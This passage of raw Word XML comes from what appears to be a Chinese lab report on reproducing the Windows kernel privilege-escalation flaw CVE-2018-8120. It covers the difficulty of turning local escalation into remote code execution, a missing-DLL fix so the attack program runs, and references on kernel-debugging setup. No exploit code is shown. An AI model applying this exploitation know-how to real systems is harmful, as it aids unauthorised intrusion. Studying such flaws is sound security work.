      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:before="180" w:after="180"/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由</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>LPE到RCE难度在哪里？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:spacing w:before="180" w:after="180"/>
        <w:ind w:left="420" w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体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内核结构体数据信息泄漏难度不同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本地可以调试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远程只能依赖泄漏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pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc60684279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遇到问题的解决方案</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>初次运行生成的目标文件，系统提示丢失VCRUNTIME</w:t>
      </w:r>
      <w:r>
        <w:t>140</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>D.</w:t>
      </w:r>
      <w:r>
        <w:t>dll</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。去微软官网下载安装程序，安装并重启虚拟机。攻击程序可以正常运行。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4709160" cy="1661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丢失</w:t>
      </w:r>
      <w:r>
        <w:t>VCRUNTIME140D.dll</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc60684280"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>六、参考文献</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/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4d61726b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VirtualKD-Redux Tutorial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https://github.com/4d61726b/VirtualKD-Redux/blob/master/VirtualKD-Redux/Docs/Tutorial.md</w:t>
      </w:r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BianChengNan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使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> VMware + win10 + VirtualKD + windbg 从零搭建双机内核调试环境. https://bianchengnan.gitee.io/articles/vmware-virtualkd-windbg-win10-kernel-debug-setup-step-by-step/</w:t>
      </w:r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Wwoc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CVE-2018-8120 漏洞分析复现-Day1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https://blog.csdn.net/qq_38025365/article/details/106321131</w:t>
      </w:r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Wwoc. CVE-2018-8120 漏洞分析复现-Day2-完成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https://blog.csdn.net/qq_38025365/article/details/106343443</w:t>
      </w:r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alphalab. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"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 xml:space="preserve">CVE-2018-8120的最新Windows提权漏洞分析. </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://www.freebuf.com/vuls/174183.html" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="13"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>https://www.freebuf.com/vuls/174183.html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="13"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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morecoder. Windows本地内核提权——Win32组件空指针漏洞（CVE-2018-8120）. http://www.voidcn.com/article/p-gbccjeoc-bya.html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23721309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F05"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="038F3F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9E64D8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="039E64D8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73DBC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1BD73DB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CF77479"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1CF7747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716CA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="269716C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902EB3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="29902EB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75C9B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="63E75C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B0"/>
    <w:rsid w:val="00035E36"/>
    <w:rsid w:val="00043886"/>
    <w:rsid w:val="000C001E"/>
    <w:rsid w:val="000C114A"/>
    <w:rsid w:val="000C7AD0"/>
    <w:rsid w:val="000F3FDC"/>
    <w:rsid w:val="001239FD"/>
    <w:rsid w:val="00174DEC"/>
    <w:rsid w:val="001803ED"/>
    <w:rsid w:val="001A2380"/>
    <w:rsid w:val="001B1C1B"/>
    <w:rsid w:val="001B6247"/>
    <w:rsid w:val="0021308C"/>
    <w:rsid w:val="00213B6D"/>
    <w:rsid w:val="00293433"/>
    <w:rsid w:val="00321625"/>
    <w:rsid w:val="003421CB"/>
    <w:rsid w:val="00343EE9"/>
    <w:rsid w:val="00362C4A"/>
    <w:rsid w:val="00381C03"/>
    <w:rsid w:val="003D23FE"/>
    <w:rsid w:val="00407E6C"/>
    <w:rsid w:val="00411D1C"/>
    <w:rsid w:val="00422251"/>
    <w:rsid w:val="00434F60"/>
    <w:rsid w:val="0044386F"/>
    <w:rsid w:val="00451DB1"/>
    <w:rsid w:val="004610C1"/>
    <w:rsid w:val="00465A4A"/>
    <w:rsid w:val="00471AA9"/>
    <w:rsid w:val="00491949"/>
    <w:rsid w:val="004E6893"/>
    <w:rsid w:val="00504EF0"/>
    <w:rsid w:val="005274ED"/>
    <w:rsid w:val="00542B36"/>
    <w:rsid w:val="00554530"/>
    <w:rsid w:val="00571233"/>
    <w:rsid w:val="005C79CC"/>
    <w:rsid w:val="005F6CCE"/>
    <w:rsid w:val="0060165B"/>
    <w:rsid w:val="00615ED8"/>
    <w:rsid w:val="00626C5F"/>
    <w:rsid w:val="0065061D"/>
    <w:rsid w:val="006562F3"/>
    <w:rsid w:val="006652CD"/>
    <w:rsid w:val="0066539E"/>
    <w:rsid w:val="00681E6A"/>
    <w:rsid w:val="00683CB5"/>
    <w:rsid w:val="00690BE0"/>
    <w:rsid w:val="006924B9"/>
    <w:rsid w:val="006A3634"/>
    <w:rsid w:val="00704C2D"/>
    <w:rsid w:val="00710C29"/>
    <w:rsid w:val="00711D8E"/>
    <w:rsid w:val="00713037"/>
    <w:rsid w:val="007213E5"/>
    <w:rsid w:val="00722E37"/>
    <w:rsid w:val="007259FD"/>
    <w:rsid w:val="00761EE7"/>
    <w:rsid w:val="00774478"/>
    <w:rsid w:val="00790E0D"/>
    <w:rsid w:val="007A5E56"/>
    <w:rsid w:val="007B2F79"/>
    <w:rsid w:val="007D0EAE"/>
    <w:rsid w:val="007D16C4"/>
    <w:rsid w:val="0081297F"/>
    <w:rsid w:val="00813FF9"/>
    <w:rsid w:val="00852133"/>
    <w:rsid w:val="00863075"/>
    <w:rsid w:val="00871047"/>
    <w:rsid w:val="0087621F"/>
    <w:rsid w:val="008B27CC"/>
    <w:rsid w:val="008F1B42"/>
    <w:rsid w:val="00906918"/>
    <w:rsid w:val="009200E3"/>
    <w:rsid w:val="00925C10"/>
    <w:rsid w:val="009411B1"/>
    <w:rsid w:val="00952397"/>
    <w:rsid w:val="009842FF"/>
    <w:rsid w:val="00984C48"/>
    <w:rsid w:val="009B4FD0"/>
    <w:rsid w:val="009E02FF"/>
    <w:rsid w:val="009E39C5"/>
    <w:rsid w:val="00A203D5"/>
    <w:rsid w:val="00A442F2"/>
    <w:rsid w:val="00A556B1"/>
    <w:rsid w:val="00AB1156"/>
    <w:rsid w:val="00AD2442"/>
    <w:rsid w:val="00AF6CA5"/>
    <w:rsid w:val="00B049B0"/>
    <w:rsid w:val="00B04E9B"/>
    <w:rsid w:val="00B1033A"/>
    <w:rsid w:val="00B25114"/>
    <w:rsid w:val="00B315F8"/>
    <w:rsid w:val="00B93E25"/>
    <w:rsid w:val="00B968E1"/>
    <w:rsid w:val="00BC7015"/>
    <w:rsid w:val="00BD3B94"/>
    <w:rsid w:val="00C3169B"/>
    <w:rsid w:val="00C37B3A"/>
    <w:rsid w:val="00C62DC2"/>
    <w:rsid w:val="00C76674"/>
    <w:rsid w:val="00C830D3"/>
    <w:rsid w:val="00C902D2"/>
    <w:rsid w:val="00C92C6B"/>
    <w:rsid w:val="00CB34D0"/>
    <w:rsid w:val="00CD4C02"/>
    <w:rsid w:val="00CE4A5F"/>
    <w:rsid w:val="00CE7D22"/>
    <w:rsid w:val="00CF2C9D"/>
    <w:rsid w:val="00D016D5"/>
    <w:rsid w:val="00D06258"/>
    <w:rsid w:val="00D10A00"/>
    <w:rsid w:val="00D24174"/>
    <w:rsid w:val="00DF6E29"/>
    <w:rsid w:val="00E02F43"/>
    <w:rsid w:val="00E2244E"/>
    <w:rsid w:val="00E23E34"/>
    <w:rsid w:val="00E62871"/>
    <w:rsid w:val="00E63150"/>
    <w:rsid w:val="00E73BDB"/>
    <w:rsid w:val="00E76089"/>
    <w:rsid w:val="00E85CF8"/>
    <w:rsid w:val="00E91281"/>
    <w:rsid w:val="00EA7530"/>
    <w:rsid w:val="00EB2383"/>
    <w:rsid w:val="00EC3E39"/>
    <w:rsid w:val="00EF42BD"/>
    <w:rsid w:val="00EF6903"/>
    <w:rsid w:val="00F12DB0"/>
    <w:rsid w:val="00F13792"/>
    <w:rsid w:val="00F22C84"/>
    <w:rsid w:val="00F35DFB"/>
    <w:rsid w:val="00F36851"/>
    <w:rsid w:val="00F6152A"/>
    <w:rsid w:val="00F71096"/>
    <w:rsid w:val="00F77606"/>
    <w:rsid w:val="00F91654"/>
    <w:rsid w:val="00FA42F9"/>
    <w:rsid w:val="699E9DFC"/>
    <w:rsid w:val="6EFFB820"/>
    <w:rsid w:val="6FFE4B92"/>
    <w:rsid w:val="BDBF5155"/>
    <w:rsid w:val="DB62EE7B"/>
    <w:rsid w:val="ED3F8E3F"/>
    <w:rsid w:val="FF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6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Cambria" w:hAnsi="Cambria" w:eastAsia="宋体" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="44"/>
      <w:sz w:val="44"/>
      <w:szCs w:val="44"/>
      <w:lang w:eastAsia="en-US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19">
    <w:name w:val="标题 3 字符"/>
    <w:basedOn w:val="12"/>
    <w:link w:val="4"/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/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theme="minorBidi"/>
      <w:kern w:val="2"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="22"/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3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24">
    <w:name w:val="comment"/>
    <w:basedOn w:val="12"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="25">
    <w:name w:val="keyword"/>
    <w:basedOn w:val="12"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="26">
    <w:name w:val="string"/>
    <w:basedOn w:val="12"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="27">
    <w:name w:val="number"/>
    <w:basedOn w:val="12"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="28">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="1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936</Words>
  <Characters>5336</Characters>
  <Lines>44</Lines>
  <Paragraphs>12</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>6260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2020-10-15T19:13:00Z</dcterms:created>
  <dc:creator>柠檬茶 防脱</dc:creator>
  <cp:lastModifiedBy>shirohaethu</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-01-25T20:31:13Z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